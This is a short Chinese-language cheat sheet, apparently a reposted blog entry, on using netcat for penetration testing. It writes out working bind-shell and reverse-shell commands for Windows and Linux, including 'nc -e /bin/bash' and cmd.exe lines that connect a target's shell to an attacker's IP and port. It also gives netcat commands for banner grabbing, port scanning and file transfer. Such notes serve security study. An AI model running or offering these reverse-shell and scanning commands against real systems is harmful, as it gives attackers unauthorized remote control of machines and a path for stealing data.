隧道技术-nc
作者:互联网
shell反弹
正向反弹:攻击机直接连接靶机
条件:攻击机与靶机需互相访问
eg:攻击机:192.168.3.27 靶机:192.168.3.29
1111是端口号
靶机执行:
windows机器:nc -lvvp 1111 -e C:\Windows\System32\cmd.exe
Linux机器: nc -lvvp 1111 -e /bin/bash
攻击机执行:
nc 192.168.3.29 1111
反响反弹:靶机访问攻击机
条件:攻击机不能直接访问靶机,但靶机可以访问攻击机的机器,这个时候用反响shell
eg:攻击机:192.168.3.27 靶机:192.168.3.29
攻击机执行:nc -lvvp 1111 监听1111端口
靶机执行:
windows机器IP端口:nc -e C:\Windows\System32\cmd.exe 192.168.3.27 1111
Linux机器IP端口:nc -e /bin/bash 192.168.3.27 1111
Banner抓取:靶机运行着ssh服务,可查看服务版本
nc -nv IP port
端口探测:可查看端口开放
.\nc.exe -nv IP PORT
多端口探测
nc -v -z IP 1-65525
端口监听
nc -l -p Port
文件传输
接收端:nc -lp Port>file
发送端:nc -vn IP Port < file -q 1(Windows是-w Linux是-q)
标签:隧道,攻击机,IP,nc,技术,192.168,1111,靶机 来源: https://www.cnblogs.com/lxshen/p/16298851.html